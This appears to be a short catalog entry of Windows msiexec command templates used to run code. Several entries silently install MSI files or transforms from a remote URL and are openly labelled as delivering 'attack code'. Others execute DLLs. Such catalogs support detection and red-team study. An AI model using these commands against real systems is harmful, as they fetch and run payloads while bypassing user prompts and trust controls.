Used by Windows to execute msi files
Installs the target .MSI file silently.
msiexec /quiet /i {PATH:.msi}
Execute custom made msi file with attack code
Installs the target remote & renamed .MSI file silently.
msiexec /q /i {REMOTEURL}
Execute custom made msi file with attack code from remote server
Calls DllRegisterServer to register the target DLL.
msiexec /y {PATH_ABSOLUTE:.dll}
Execute dll files
Calls DllUnregisterServer to un-register the target DLL.
msiexec /z {PATH_ABSOLUTE:.dll}
Execute dll files
Installs the target .MSI file from a remote URL, the file can be signed by vendor. Additional to the file a transformation file will be used, which can contains malicious code or binaries. The /qb will skip user input.
msiexec /i {PATH_ABSOLUTE:.msi} TRANSFORMS="{REMOTEURL:.mst}" /qb
Install trusted and signed msi file, with additional attack code as transformation file, from a remote server